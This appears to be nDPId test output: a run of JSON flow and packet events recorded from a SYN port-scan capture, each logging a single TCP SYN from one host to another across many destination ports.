-00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1144,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1135,"flow_packet_id":1,"flow_last_seen":1278275060226,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060226,"pkt":"ACYLMQczACWzv5HuCABFAAAsMAkAADMG5WmsEAAIQA2GNIzSAgzdUoMYAAAAAGACEAAmgwAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1145,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1136,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060226,"flow_last_seen":1278275060226,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060226,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5100,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1145,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1136,"flow_packet_id":1,"flow_last_seen":1278275060226,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060226,"pkt":"ACYLMQczACWzv5HuCABFAAAsuKkAAC0GYsmsEAAIQA2GNIzSE+zdUoMYAAAAAGACCAAcowAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1146,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1137,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060226,"flow_last_seen":1278275060226,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060226,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1091,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1146,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1137,"flow_packet_id":1,"flow_last_seen":1278275060226,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060226,"pkt":"ACYLMQczACWzv5HuCABFAAAsn50AADoGbtWsEAAIQA2GNIzSBEPdUoMYAAAAAGACDAAoTAAAAgQFtA=="} -00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1147,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1138,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060226,"flow_last_seen":1278275060226,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060226,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":15000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1147,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1138,"flow_packet_id":1,"flow_last_seen":1278275060226,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060226,"pkt":"ACYLMQczACWzv5HuCABFAAAsP3kAADcG0fmsEAAIQA2GNIzSOpjdUoMYAAAAAGACEADt9gAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1148,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1139,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060226,"flow_last_seen":1278275060226,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060226,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":19,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1148,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1139,"flow_packet_id":1,"flow_last_seen":1278275060226,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060226,"pkt":"ACYLMQczACWzv5HuCABFAAAsaQ4AAC4GsWSsEAAIQA2GNIzSABPdUoMYAAAAAGACDAAsfAAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1149,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1140,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060226,"flow_last_seen":1278275060226,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060226,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2042,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1149,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1140,"flow_packet_id":1,"flow_last_seen":1278275060226,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060226,"pkt":"ACYLMQczACWzv5HuCABFAAAsxlsAADgGShesEAAIQA2GNIzSB\/rdUoMYAAAAAGACBAAslQAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1150,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1141,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060226,"flow_last_seen":1278275060226,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060226,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1138,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1150,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1141,"flow_packet_id":1,"flow_last_seen":1278275060226,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060226,"pkt":"ACYLMQczACWzv5HuCABFAAAsOUgAAC8G4CqsEAAIQA2GNIzSBHLdUoMYAAAAAGACEAAkHQAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1151,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1142,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060226,"flow_last_seen":1278275060226,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060226,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5960,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1151,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1142,"flow_packet_id":1,"flow_last_seen":1278275060226,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060226,"pkt":"ACYLMQczACWzv5HuCABFAAAshl8AADYGjBOsEAAIQA2GNIzSF0jdUoMYAAAAAGACDAAVRwAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1152,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1143,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060226,"flow_last_seen":1278275060226,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060226,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2144,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1152,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1143,"flow_packet_id":1,"flow_last_seen":1278275060226,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060226,"pkt":"ACYLMQczACWzv5HuCABFAAAshqYAACwGlcysEAAIQA2GNIzSCGDdUoMYAAAAAGACBAAsLwAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1153,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1144,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060226,"flow_last_seen":1278275060226,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060226,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1106,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1153,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1144,"flow_packet_id":1,"flow_last_seen":1278275060226,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060226,"pkt":"ACYLMQczACWzv5HuCABFAAAsrlkAADsGXxmsEAAIQA2GNIzSBFLdUoMYAAAAAGACEAAkPQAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1154,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1145,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060226,"flow_last_seen":1278275060226,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060226,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":4446,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1154,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1145,"flow_packet_id":1,"flow_last_seen":1278275060226,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060226,"pkt":"ACYLMQczACWzv5HuCABFAAAsP9EAAC4G2qGsEAAIQA2GNIzSEV7dUoMYAAAAAGACDAAbMQAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1155,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1146,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060226,"flow_last_seen":1278275060226,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060226,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5432,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1155,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1146,"flow_packet_id":1,"flow_last_seen":1278275060226,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060226,"pkt":"ACYLMQczACWzv5HuCABFAAAs6z0AACoGMzWsEAAIQA2GNIzSFTjdUoMYAAAAAGACDAAXVwAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1156,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1147,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060226,"flow_last_seen":1278275060226,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060226,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8085,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1156,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1147,"flow_packet_id":1,"flow_last_seen":1278275060226,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060226,"pkt":"ACYLMQczACWzv5HuCABFAAAs56MAADUGK8+sEAAIQA2GNIzSH5XdUoMYAAAAAGACCAAQ+gAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1157,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1148,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060226,"flow_last_seen":1278275060226,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060226,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2119,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1157,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1148,"flow_packet_id":1,"flow_last_seen":1278275060226,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060226,"pkt":"ACYLMQczACWzv5HuCABFAAAsJ4kAAC8G8emsEAAIQA2GNIzSCEfdUoMYAAAAAGACEAAgSAAAAgQFtA=="} -00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1158,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1149,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060285,"flow_last_seen":1278275060285,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060285,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":22939,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1158,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1149,"flow_packet_id":1,"flow_last_seen":1278275060285,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060285,"pkt":"ACYLMQczACWzv5HuCABFAAAskOgAADcGgIqsEAAIQA2GNIzTWZvdU4MZAAAAAGACEADO8AAAAgQFtA=="} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1159,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1150,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060285,"flow_last_seen":1278275060285,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060285,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":406,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1159,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1150,"flow_packet_id":1,"flow_last_seen":1278275060285,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060285,"pkt":"ACYLMQczACWzv5HuCABFAAAsdUkAADcGnCmsEAAIQA2GNIzTAZbdU4MZAAAAAGACEAAm9gAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1160,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1151,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060285,"flow_last_seen":1278275060285,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060285,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1782,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1160,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1151,"flow_packet_id":1,"flow_last_seen":1278275060285,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060285,"pkt":"ACYLMQczACWzv5HuCABFAAAsdt4AADEGoJSsEAAIQA2GNIzTBvbdU4MZAAAAAGACCAAplgAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1161,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1152,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060285,"flow_last_seen":1278275060285,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060285,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1050,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1161,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1152,"flow_packet_id":1,"flow_last_seen":1278275060285,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060285,"pkt":"ACYLMQczACWzv5HuCABFAAAsDDQAACoGEj+sEAAIQA2GNIzTBBrdU4MZAAAAAGACDAAocgAAAgQFtA=="} -00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1162,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1153,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060285,"flow_last_seen":1278275060285,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060285,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":33354,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1162,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1153,"flow_packet_id":1,"flow_last_seen":1278275060285,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060285,"pkt":"ACYLMQczACWzv5HuCABFAAAsdKAAADUGntKsEAAIQA2GNIzTgkrdU4MZAAAAAGACCACuQQAAAgQFtA=="} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1163,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1154,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060285,"flow_last_seen":1278275060285,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060285,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":255,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1163,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1154,"flow_packet_id":1,"flow_last_seen":1278275060285,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060285,"pkt":"ACYLMQczACWzv5HuCABFAAAsUMkAACkGzqmsEAAIQA2GNIzTAP\/dU4MZAAAAAGACCAAvjQAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1164,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1155,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060285,"flow_last_seen":1278275060285,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060285,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8652,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1164,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1155,"flow_packet_id":1,"flow_last_seen":1278275060285,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060285,"pkt":"ACYLMQczACWzv5HuCABFAAAs188AADYGOqOsEAAIQA2GNIzTIczdU4MZAAAAAGACDAAKwAAAAgQFtA=="} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1165,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1156,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060285,"flow_last_seen":1278275060285,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060285,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":992,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1165,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1156,"flow_packet_id":1,"flow_last_seen":1278275060285,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060285,"pkt":"ACYLMQczACWzv5HuCABFAAAsywEAACkGVHGsEAAIQA2GNIzTA+DdU4MZAAAAAGACCAAsrAAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1166,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1157,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060285,"flow_last_seen":1278275060285,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060285,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3527,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1166,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1157,"flow_packet_id":1,"flow_last_seen":1278275060285,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060285,"pkt":"ACYLMQczACWzv5HuCABFAAAs13sAADoGNvesEAAIQA2GNIzTDcfdU4MZAAAAAGACDAAexQAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1167,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1158,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060285,"flow_last_seen":1278275060285,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060285,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9090,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1167,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1158,"flow_packet_id":1,"flow_last_seen":1278275060285,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060285,"pkt":"ACYLMQczACWzv5HuCABFAAAstKwAADMGYMasEAAIQA2GNIzTI4LdU4MZAAAAAGACEAAFCgAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1168,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1159,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060285,"flow_last_seen":1278275060285,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060285,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8402,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1168,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1159,"flow_packet_id":1,"flow_last_seen":1278275060285,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060285,"pkt":"ACYLMQczACWzv5HuCABFAAAs+qYAAC8GHsysEAAIQA2GNIzTINLdU4MZAAAAAGACEAAHugAAAgQFtA=="} 